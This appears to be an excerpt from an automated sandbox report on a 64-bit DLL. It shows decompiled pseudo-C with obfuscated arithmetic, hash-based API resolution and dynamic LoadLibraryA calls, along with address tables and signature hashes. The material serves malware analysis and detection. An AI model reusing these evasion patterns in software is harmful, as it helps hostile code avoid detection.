                          				_t148 = r8d - 0x343c;
                          				if (_t148 >= 0) goto 0x8c07abf1;
                          				_t166 = _t165 - 1;
                          				if (_t148 != 0) goto 0x8c07abe0;
                          				 *((long long*)(_t188 + 0x198)) =  *((intOrPtr*)(_t188 + 0x198)) + ( *(_t188 + 0xb8) ^ 0x000027b2);
                          				_t149 =  *((intOrPtr*)( *_t188 + 0x130)) - 0x3c5 - 0x2032;
                          				if (_t149 >= 0) goto 0x8c07ac25;
                          				if (_t149 != 0) goto 0x8c07ac17;
                          				 *(_t188 + 0x1b8) =  *(_t188 + 0x1c0) | _t161;
                          				r10d = _t190 - 0x4c4;
                          				r8d = _t190 - 0x1a27;
                          				r11d = _t166 - 0xeb4;
                          				 *((long long*)(_t188 + 0x158)) =  *((intOrPtr*)(_t188 + 0x140));
                          				 *((intOrPtr*)(_t181 + 0x58)) = _t190 - 0x8d0;
                          				r9d = _t166 + 0xefd;
                          				 *(_t181 + 0x50) = r10d;
                          				 *((intOrPtr*)(_t181 + 0x48)) = r11d;
                          				 *((long long*)(_t181 + 0x40)) = _t188;
                          				 *(_t181 + 0x38) = _t166 + 0x3f3;
                          				 *((intOrPtr*)(_t181 + 0x30)) = _t166 + 0x13da;
                          				 *(_t181 + 0x28) =  *(_t181 + 0x110);
                          				 *(_t181 + 0x20) = _t109 + 0x70c;
                          				_t116 = E00007FF87FF88C089610( *((intOrPtr*)(_t188 + 0x140)), _t161, _t166,  *(_t188 + 0x1c0) | _t161, __r8, _t184, __r10, _t188, _t190, _t192, _t194); // executed
                          				return _t116 + 0x1086;
                          			}



























                          0x7ff88c07a970
                          0x7ff88c07a970
                          0x7ff88c07a973
                          0x7ff88c07a977
                          0x7ff88c07a978
                          0x7ff88c07a979
                          0x7ff88c07a97f
                          0x7ff88c07a994
                          0x7ff88c07a9a2
                          0x7ff88c07a9b0
                          0x7ff88c07a9b7
                          0x7ff88c07a9be
                          0x7ff88c07a9c5
                          0x7ff88c07a9cd
                          0x7ff88c07a9d4
                          0x7ff88c07a9e3
                          0x7ff88c07a9ea
                          0x7ff88c07a9f2
                          0x7ff88c07a9f9
                          0x7ff88c07aa00
                          0x7ff88c07aa07
                          0x7ff88c07aa0f
                          0x7ff88c07aa15
                          0x7ff88c07aa20
                          0x7ff88c07aa26
                          0x7ff88c07aa31
                          0x7ff88c07aa35
                          0x7ff88c07aa3c
                          0x7ff88c07aa42
                          0x7ff88c07aa4a
                          0x7ff88c07aa50
                          0x7ff88c07aa53
                          0x7ff88c07aa5c
                          0x7ff88c07aa5f
                          0x7ff88c07aa68
                          0x7ff88c07aa6e
                          0x7ff88c07aa7a
                          0x7ff88c07aa81
                          0x7ff88c07aa89
                          0x7ff88c07aaa5
                          0x7ff88c07aaac
                          0x7ff88c07aab7
                          0x7ff88c07aacd
                          0x7ff88c07aada
                          0x7ff88c07aae1
                          0x7ff88c07aaed
                          0x7ff88c07aaf8
                          0x7ff88c07aafe
                          0x7ff88c07ab13
                          0x7ff88c07ab17
                          0x7ff88c07ab25
                          0x7ff88c07ab2a
                          0x7ff88c07ab2f
                          0x7ff88c07ab33
                          0x7ff88c07ab37
                          0x7ff88c07ab42
                          0x7ff88c07ab46
                          0x7ff88c07ab4a
                          0x7ff88c07ab4e
                          0x7ff88c07ab53
                          0x7ff88c07ab58
                          0x7ff88c07ab62
                          0x7ff88c07ab68
                          0x7ff88c07ab6d
                          0x7ff88c07ab76
                          0x7ff88c07ab82
                          0x7ff88c07ab87
                          0x7ff88c07ab9b
                          0x7ff88c07ab9e
                          0x7ff88c07abaf
                          0x7ff88c07abb6
                          0x7ff88c07abbd
                          0x7ff88c07abc0
                          0x7ff88c07abe3
                          0x7ff88c07abe7
                          0x7ff88c07abe9
                          0x7ff88c07ac06
                          0x7ff88c07ac08
                          0x7ff88c07ac1b
                          0x7ff88c07ac1d
                          0x7ff88c07ac2c
                          0x7ff88c07ac3b
                          0x7ff88c07ac48
                          0x7ff88c07ac6c
                          0x7ff88c07ac7b
                          0x7ff88c07ac7f
                          0x7ff88c07ac94
                          0x7ff88c07ac99
                          0x7ff88c07ac9e
                          0x7ff88c07aca9
                          0x7ff88c07acb3
                          0x7ff88c07acb7
                          0x7ff88c07acbb
                          0x7ff88c07acbf
                          0x7ff88c07acf0

                          APIs
                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00002103,-00000CDF), ref: 00007FF88C07AD58
                            • Part of subcall function 00007FF88C079AC0: GetProcessHeap.KERNEL32(?,?,?,00007FF88C08D72E), ref: 00007FF88C079B22
                            • Part of subcall function 00007FF88C079AC0: RtlAllocateHeap.NTDLL(?,?,?,00007FF88C08D72E), ref: 00007FF88C079B35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$AllocateObjectProcessSingleWait
                          • String ID: 8
                          • API String ID: 4287835514-406019892
                          • Opcode ID: 4921803c66df661b67f01d954ab6fee2acbef056c79a9dc11780c0e28760a7c6
                          • Instruction ID: 466944e3c4433c019a848c24e96976486b26d0f6aee746dcdaf7393f4483b6f3
                          • Opcode Fuzzy Hash: 4921803c66df661b67f01d954ab6fee2acbef056c79a9dc11780c0e28760a7c6
                          • Instruction Fuzzy Hash: 89D179736086C4CBD725CF14E488BDABBA8F788788F054129DB8957B58DB38EA45CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: HeapPrivilegeProcessRelease
                          • String ID:
                          • API String ID: 2757213858-0
                          • Opcode ID: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                          • Instruction ID: a6a064347a64b43368fcb98f917e97c2a05f7e6efa116659fde1124ceb013a52
                          • Opcode Fuzzy Hash: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                          • Instruction Fuzzy Hash: 0541B272609B8586DB58CB15E4947E9B3A4F785BC8F084235DB8D47F48EF38D9A5CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00007FF87FF88C079AC0(long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a16, long long _a24) {
                          
                          				_a16 = __rbx;
                          				_a24 = __rbp;
                          				r8d =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x1a0)) + 0xb0));
                          				r8d = r8d - 0x27b3;
                          				if ( *((intOrPtr*)(__rdx + 0x158)) != r8d) goto 0x8c079b07;
                          				return 0;
                          			}



                          0x7ff88c079ac0
                          0x7ff88c079ac5
                          0x7ff88c079ae2
                          0x7ff88c079ae9
                          0x7ff88c079af3
                          0x7ff88c079b06

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                          • Instruction ID: 88729192d42e47d2d594e872ac0aab6d43bf0258fb41e70a577f2a1ccba451ec
                          • Opcode Fuzzy Hash: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                          • Instruction Fuzzy Hash: 65116A72719B8085EB49CB66E4842AEA3A4F78DBC0F484135DF4D43B49DF39D5A18B00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: AllocHeap
                          • String ID:
                          • API String ID: 4292702814-0
                          • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                          • Instruction ID: 963a529334d14f8b5285cf3c0a55549b4d49be586addb2b1fb92c3612ab0a24e
                          • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                          • Instruction Fuzzy Hash: D0517D73608B80C6DB74CF05E448B5AB7B8F789B94F525125EE8D43B99CB38C8A1DB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 29%
                          			E0000027E27ED3715FC8(long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
                          				long long* _t32;
                          				long long* _t35;
                          				long long _t41;
                          				void* _t56;
                          				void* _t57;
                          
                          				_t32 = __rax;
                          				_a8 = __rbx;
                          				_a16 = __rbp;
                          				_a32 = __rsi;
                          				_t48 =  *0xd371d458;
                          				E0000027E27ED371908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t32 == 0) goto 0xd3716006;
                          				LoadLibraryA(??); // executed
                          				_t35 = _t32;
                          				goto 0xd3716008;
                          				if (_t35 == 0) goto 0xd3716048;
                          				if (E0000027E27ED37140F8(_t35,  &_a24, _t56, _t57) != 0) goto 0xd371602e;
                          				_t41 = _a24;
                          				 *_t41 = _t35;
                          				 *__rdx = _t41;
                          				goto 0xd3716066;
                          				E0000027E27ED371908C(0xc8e2960c, _t32,  *((intOrPtr*)( *0xd371d458 + 0x18)));
                          				if (_t32 == 0) goto 0xd3716066;
                          				 *_t32();
                          				goto 0xd3716066;
                          				E0000027E27ED371908C(0xc06f8334, _t32,  *((intOrPtr*)(_t48 + 0x18)));
                          				if (_t32 == 0) goto 0xd3716061;
                          				 *_t32();
                          				goto 0xd3716066;
                          				return 0x7f;
                          			}








                          0x27ed3715fc8
                          0x27ed3715fc8
                          0x27ed3715fcd
                          0x27ed3715fd2
                          0x27ed3715fdc
                          0x27ed3715ff2
                          0x27ed3715ffa
                          0x27ed3715fff
                          0x27ed3716001
                          0x27ed3716004
                          0x27ed371600b
                          0x27ed371601e
                          0x27ed3716020
                          0x27ed3716025
                          0x27ed3716028
                          0x27ed371602c
                          0x27ed3716037
                          0x27ed371603f
                          0x27ed3716044
                          0x27ed3716046
                          0x27ed3716051
                          0x27ed3716059
                          0x27ed371605b
                          0x27ed371605f
                          0x27ed371607c

                          APIs
                            • Part of subcall function 0000027ED371908C: SetLastError.KERNEL32 ref: 0000027ED37190C8
                          • LoadLibraryA.KERNELBASE(?,?,00000000,0000027ED3718947,?,?,?,?,?,0000027ED3719D9C), ref: 0000027ED3715FFF
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: ErrorLastLibraryLoad
                          • String ID:
                          • API String ID: 3568775529-0
                          • Opcode ID: 732c632c0e59d618d2429848589057d7e5eb850a61d6535023b46e3602ede8c6
                          • Instruction ID: 3be8d939b3646289783d94f32cddbea1547212ccc66707f8fd3fd10caf78ef69
                          • Opcode Fuzzy Hash: 732c632c0e59d618d2429848589057d7e5eb850a61d6535023b46e3602ede8c6
                          • Instruction Fuzzy Hash: 9E114C33719B55C6EE309B52A54426A6268F78EBC0F1A64A19E4E4778BDF38D9418230
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E00007FF87FF88C07E154(intOrPtr* __rax, void* __rcx) {
                          				void* __rbx;
                          
                          				if (__rcx - 0xffffffe0 > 0) goto 0x8c07e19f;
                          				_t16 =  ==  ? __rax : __rcx;
                          				goto 0x8c07e186;
                          				if (E00007FF87FF88C081374() == 0) goto 0x8c07e19f;
                          				if (E00007FF87FF88C080F5C(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0x8c07e19f;
                          				RtlAllocateHeap(??, ??, ??); // executed
                          				if (__rax == 0) goto 0x8c07e171;
                          				goto 0x8c07e1ac;
                          				E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0xc;
                          				return 0;
                          			}




                          0x7ff88c07e161
                          0x7ff88c07e16b
                          0x7ff88c07e16f
                          0x7ff88c07e178
                          0x7ff88c07e184
                          0x7ff88c07e192
                          0x7ff88c07e19b
                          0x7ff88c07e19d
                          0x7ff88c07e19f
                          0x7ff88c07e1a4
                          0x7ff88c07e1b1

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 1e315ab79d3799dadb36331b2310a3d77001c73eb90f6160aecb35f2658c2b1a
                          • Instruction ID: 1ba38514461fea5b6443abaa84fbe3250b8defddfdbf5513ed5ddbf26b3f3ceb
                          • Opcode Fuzzy Hash: 1e315ab79d3799dadb36331b2310a3d77001c73eb90f6160aecb35f2658c2b1a
                          • Instruction Fuzzy Hash: FDF0FE30B1E24659FE6866A2D91227515907F9ABE0F098630D93E452CADF2DB450C510
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 73%
                          			_entry_(void* __ecx, void* __edx, long long __rcx, void* __r8) {
                          				void* __rbx;
                          				void* _t2;
                          				long long* _t15;
                          				long long _t16;
                          				void* _t20;
                          				long long _t21;
                          				long long _t22;
                          				void* _t24;
                          				void* _t25;
                          
                          				_t17 = __rcx;
                          				if (__edx == 0) goto 0xd371697b;
                          				if (__edx != 1) goto 0xd3716998;
                          				_t20 = __r8; // executed
                          				_t2 = E0000027E27ED3714DB4(_t16, __rcx, _t21, _t22, _t24, _t25); // executed
                          				if (_t2 == 0) goto 0xd3716998;
                          				goto 0xd3716998;
                          				E0000027E27ED3716CE4(_t15, _t16, _t17, _t20, _t22);
                          				if ( *0xd371d458 == 0) goto 0xd3716998;
                          				HeapDestroy(??); // executed
                          				return 0;
                          			}












                          0x27ed3716958
                          0x27ed3716965
                          0x27ed3716969
                          0x27ed371696b
                          0x27ed371696e
                          0x27ed3716975
                          0x27ed3716979
                          0x27ed371697d
                          0x27ed371698c
                          0x27ed3716992
                          0x27ed371699f

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.402437262.0000027ED3710000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027ED3710000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_27ed3710000_loaddll64.jbxd
                          Similarity
                          • API ID: Heap$Destroy$AllocCreate
                          • String ID:
                          • API String ID: 3351204586-0
                          • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                          • Instruction ID: 9a51ac7ee886230be76779118613eebb4b70fdbc78c2c14061abe55bdd18243e
                          • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                          • Instruction Fuzzy Hash: 76E09233709940C2FF745A61859833B826C7B4E740F1778BC4D0D492C7EE18D8859230
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 55%
                          			E00007FF87FF88C07AE80(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* __r12;
                          				void* __r14;
                          				void* __r15;
                          				signed int _t158;
                          				signed int _t159;
                          				signed int _t160;
                          				intOrPtr _t177;
                          				intOrPtr _t195;
                          				signed int _t203;
                          				signed int _t212;
                          				signed int _t224;
                          				signed int _t227;
                          				void* _t234;
                          				long long _t238;
                          				signed int* _t239;
                          				long long _t242;
                          				struct _CRITICAL_SECTION* _t256;
                          				void* _t259;
                          				void* _t261;
                          				void* _t263;
                          				void* _t264;
                          				void* _t274;
                          				void* _t278;
                          				void* _t280;
                          				signed int _t281;
                          				signed int _t282;
                          				signed long long _t283;
                          				void* _t285;
                          				void* _t287;
                          
                          				_t274 = __r10;
                          				_t266 = __r8;
                          				_t241 = __rcx;
                          				_t237 = __rbx;
                          				_t234 = __rax;
                          				 *((long long*)(_t263 + 0x18)) = __rbx;
                          				_push(_t261);
                          				_push(_t259);
                          				_t264 = _t263 - 0x90;
                          				r8d =  *(_t264 + 0x120);
                          				r14d = __rdx + 0x566;
                          				_t195 = __r9 - 0x23f6;
                          				r11d =  *(_t264 + 0xf8);
                          				_t7 = _t241 - 0xde7; // 0x27ae
                          				r11d = r11d + 0x1669;
                          				 *(_t264 + 0xd0) = r14d;
                          				r10d = __r8 - 0x1137;
                          				 *((intOrPtr*)(_t264 + 0xe8)) = _t195;
                          				_t224 = __rax + 0x61f;
                          				 *(_t264 + 0x7c) = r10d;
                          				r12d = __rax - 0x1408;
                          				 *(_t264 + 0x70) = _t224;
                          				 *(_t264 + 0xd8) = r12d;
                          				 *(_t264 + 0x74) = __r8 - 0x18b7;
                          				_t177 = __r8 - 0x64c;
                          				r9d = __r8 - 0x4af;
                          				 *((intOrPtr*)(_t264 + 0x80)) = _t177;
                          				 *(_t264 + 0x118) =  *(_t264 + 0x108) + 0xffffe9cc;
                          				 *(_t264 + 0x78) = r9d;
                          				 *(_t264 + 0x120) =  *(_t264 + 0x110) + 0xffffdefd;
                          				 *(_t264 + 0x110) = r11d;
                          				 *(_t264 + 0x108) = _t7;
                          				if (_t195 - _t278 + 0xd1 > 0) goto 0x8c07b204;
                          				_t281 =  *((intOrPtr*)(_t264 + 0x128));
                          				r15d = __r11 - 0x15b;
                          				 *(_t264 + 0x38) = r15d;
                          				 *(_t264 + 0x30) = __r9 - 0x150e;
                          				r14d = __rdx + 0x3666;
                          				 *(_t264 + 0x28) = __r9 + 0x22c;
                          				 *(_t264 + 0x20) = r15d;
                          				_t158 = E00007FF87FF88C078BF0(r14d, __r9 + 0x15b, __rax, __rbx, __rcx, __rdx, __r8, _t281, __r11, _t287, _t285, _t280, _t278);
                          				_t40 = _t259 + 0x1033; // 0x37e1
                          				r10d = _t40;
                          				r11d = _t278 + 0x25a;
                          				 *(_t264 + 0x50) = r10d;
                          				 *(_t264 + 0x48) = _t281;
                          				 *(_t264 + 0x40) = r11d;
                          				 *(_t264 + 0x38) = _t177 + 0x7bc;
                          				r9d = __rdx + 0x10a3;
                          				 *(_t264 + 0x30) = __rcx + 0x37e1;
                          				r8d = __rcx + 0x3a59;
                          				 *(_t264 + 0x28) = __rdx + 0x77c;
                          				 *(_t264 + 0x20) = _t224 + 0xffffe5d9;
                          				 *(_t264 + 0x120) = _t158;
                          				_t159 = E00007FF87FF88C08CDF0( *(_t264 + 0x110) + 0x4c4, __rax, _t237, __rcx, __rdx, __r8, __r11, _t285);
                          				r12d = r12d + 0x18b7;
                          				r9d =  *(_t264 + 0x78);
                          				r10d =  *(_t264 + 0x70);
                          				r9d = r9d + 0xffffebf8;
                          				r10d = r10d + 0xffffed59;
                          				r8d =  *(_t264 + 0x108);
                          				r8d = r8d + 0x927;
                          				 *(_t264 + 0x50) = r14d;
                          				 *(_t264 + 0x48) = _t159;
                          				r13d = _t159;
                          				 *(_t264 + 0x40) =  *(_t264 + 0x120) + 0xfffff40f;
                          				 *(_t264 + 0x38) = r9d;
                          				r11d = _t256 + 0x2598;
                          				 *(_t264 + 0x30) = r10d;
                          				r9d = r12d;
                          				 *(_t264 + 0x28) = r11d;
                          				 *(_t264 + 0x20) =  *(_t264 + 0xd0) + 0x10ce;
                          				_t238 =  *((intOrPtr*)(_t264 + 0x128));
                          				_t160 = E00007FF87FF88C072A70(_t238, __rcx, _t238, __r8, _t274); // executed
                          				_t242 =  *((intOrPtr*)(_t238 + 0x23c));
                          				r11d = _t256 + 0x27ae;
                          				_t75 = _t281 + 0xea7; // 0xea7
                          				r10d = _t75;
                          				r14d =  *(_t264 + 0xd0);
                          				r15d = _t160;
                          				r9d =  *(_t264 + 0x120);
                          				_t78 = _t234 + 0x1669; // 0x1669
                          				 *((long long*)(_t238 + 0x158)) = _t242;
                          				_t80 = _t234 + 0x19bd; // 0x19bd
                          				r8d = _t80;
                          				_t227 =  *((intOrPtr*)(_t264 + 0x80)) + 0xffffed95;
                          				 *((intOrPtr*)(_t264 + 0x68)) = _t78;
                          				r14d = r14d + 0x14c1;
                          				r9d = r9d + 0x2b1;
                          				 *(_t264 + 0x60) = r12d;
                          				 *(_t264 + 0x58) = r8d;
                          				r8d = r13d;
                          				_t282 =  *((intOrPtr*)(_t264 + 0x128));
                          				 *(_t264 + 0x50) = r10d;
                          				 *(_t264 + 0x48) = r11d;
                          				 *(_t264 + 0x40) =  *(_t264 + 0x118) + 0x77c;
                          				 *(_t264 + 0x38) = _t234 + 0x1a27;
                          				 *(_t264 + 0x30) = _t234 + 0x126b;
                          				 *(_t264 + 0x28) = _t227;
                          				 *(_t264 + 0x20) = r14d;
                          				E00007FF87FF88C0732C0(_t238, _t242, _t282, _t261, _t266, _t287);
                          				_t98 = _t287 + 0x360; // 0x360
                          				r11d =  *(_t264 + 0xd8);
                          				r9d =  *(_t264 + 0x120);
                          				r11d = r11d + 0x16b5;
                          				r10d = _t242 - 0x886;
                          				 *(_t264 + 0x48) =  *(_t264 + 0x118) + 0xd1;
                          				r8d = _t242 - 0x6af;
                          				 *(_t264 + 0x40) = r10d;
                          				_t203 = _t242 + 0x12a7;
                          				 *(_t264 + 0x38) = r11d;
                          				_t212 =  *(_t264 + 0x108) + 0x113b;
                          				 *(_t264 + 0x30) = _t282;
                          				r9d = r9d + 0x8d0;
                          				 *(_t264 + 0x28) = _t98;
                          				 *(_t264 + 0x20) = _t212;
                          				E00007FF87FF88C08D230(_t203, _t234, _t238, _t242, _t282);
                          				goto 0x8c07b37e;
                          				_t239 =  *((intOrPtr*)(_t264 + 0x128));
                          				if (_t239[0x24] - _t234 >= 0) goto 0x8c07b306;
                          				_t283 = r14d;
                          				if (_t239[0x62] - (_t239[0x50] - 0x23f6) * _t283 <= 0) goto 0x8c07b306;
                          				r15d = _t203;
                          				r12d = r11d;
                          				r12d = r12d *  *(_t264 + 0x120);
                          				r15d = r15d ^ r14d;
                          				r14d =  *(_t264 + 0x118);
                          				r8d = r12d;
                          				r9d = _t239[0x48];
                          				r9d = r9d & 0x00003595;
                          				r9d = r9d + _t239[0x50];
                          				 *(_t264 + 0x38) = (_t239[0x70] & r14d) * r9d;
                          				 *(_t264 + 0x30) = (_t239[0x36] | _t227) + _t239[0x62];
                          				 *(_t264 + 0x28) = _t239;
                          				 *(_t264 + 0x20) = r15d;
                          				E00007FF87FF88C0909D0(_t239[0x62] ^  *_t239, (r14d |  *(_t264 + 0x74)) & 0x00003666, _t239, (_t239[0x50] - 0x23f6) * _t283, _t282, _t239[0x62], _t259, _t261, _t266, _t281, __r11, _t278, _t285, _t287);
                          				r9d =  *(_t264 + 0x78);
                          				if (_t212 + 4 - (_t239[0x50] - 0x23f6) * _t283 > 0) goto 0x8c07b270;
                          				r14d =  *(_t264 + 0xd0);
                          				r12d =  *(_t264 + 0xd8);
                          				r10d =  *(_t264 + 0x7c);
                          				r11d =  *(_t264 + 0x110);
                          				r12d = r12d & r10d;
                          				if (r14d - r12d > 0) goto 0x8c07b378;
                          				 *(_t264 + 0x28) = _t239[0x2c] * _t239[0x12];
                          				 *_t239 =  *_t239 | _t239[0x62] - r14d;
                          				 *(_t264 + 0x20) = __r11 - 0x23f6;
                          				InitializeCriticalSection(_t256);
                          				return _t261 - 0x12ab;
                          			}



































                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae80
                          0x7ff88c07ae85
                          0x7ff88c07ae86
                          0x7ff88c07ae90
                          0x7ff88c07ae97
                          0x7ff88c07ae9f
                          0x7ff88c07aead
                          0x7ff88c07aeb4
                          0x7ff88c07aebc
                          0x7ff88c07aec2
                          0x7ff88c07aec9
                          0x7ff88c07aed1
                          0x7ff88c07aed8
                          0x7ff88c07aedf
                          0x7ff88c07aee5
                          0x7ff88c07aeea
                          0x7ff88c07aef1
                          0x7ff88c07aefc
                          0x7ff88c07af04
                          0x7ff88c07af08
                          0x7ff88c07af16
                          0x7ff88c07af22
                          0x7ff88c07af29
                          0x7ff88c07af3c
                          0x7ff88c07af41
                          0x7ff88c07af50
                          0x7ff88c07af58
                          0x7ff88c07af61
                          0x7ff88c07af67
                          0x7ff88c07af76
                          0x7ff88c07af84
                          0x7ff88c07af89
                          0x7ff88c07af8d
                          0x7ff88c07af94
                          0x7ff88c07afa2
                          0x7ff88c07afaa
                          0x7ff88c07afb6
                          0x7ff88c07afb6
                          0x7ff88c07afc1
                          0x7ff88c07afc9
                          0x7ff88c07afd4
                          0x7ff88c07afdf
                          0x7ff88c07aff0
                          0x7ff88c07aff4
                          0x7ff88c07affb
                          0x7ff88c07b006
                          0x7ff88c07b013
                          0x7ff88c07b01d
                          0x7ff88c07b021
                          0x7ff88c07b028
                          0x7ff88c07b034
                          0x7ff88c07b03b
                          0x7ff88c07b046
                          0x7ff88c07b04b
                          0x7ff88c07b059
                          0x7ff88c07b060
                          0x7ff88c07b075
                          0x7ff88c07b07c
                          0x7ff88c07b084
                          0x7ff88c07b088
                          0x7ff88c07b08b
                          0x7ff88c07b08f
                          0x7ff88c07b094
                          0x7ff88c07b09b
                          0x7ff88c07b0a0
                          0x7ff88c07b0a3
                          0x7ff88c07b0a8
                          0x7ff88c07b0ac
                          0x7ff88c07b0b7
                          0x7ff88c07b0bc
                          0x7ff88c07b0c3
                          0x7ff88c07b0d1
                          0x7ff88c07b0d1
                          0x7ff88c07b0d8
                          0x7ff88c07b0e0
                          0x7ff88c07b0e3
                          0x7ff88c07b0eb
                          0x7ff88c07b0f1
                          0x7ff88c07b0f8
                          0x7ff88c07b0f8
                          0x7ff88c07b114
                          0x7ff88c07b120
                          0x7ff88c07b124
                          0x7ff88c07b131
                          0x7ff88c07b13e
                          0x7ff88c07b143
                          0x7ff88c07b148
                          0x7ff88c07b14b
                          0x7ff88c07b153
                          0x7ff88c07b15b
                          0x7ff88c07b160
                          0x7ff88c07b164
                          0x7ff88c07b168
                          0x7ff88c07b16c
                          0x7ff88c07b170
                          0x7ff88c07b175
                          0x7ff88c07b17e
                          0x7ff88c07b18c
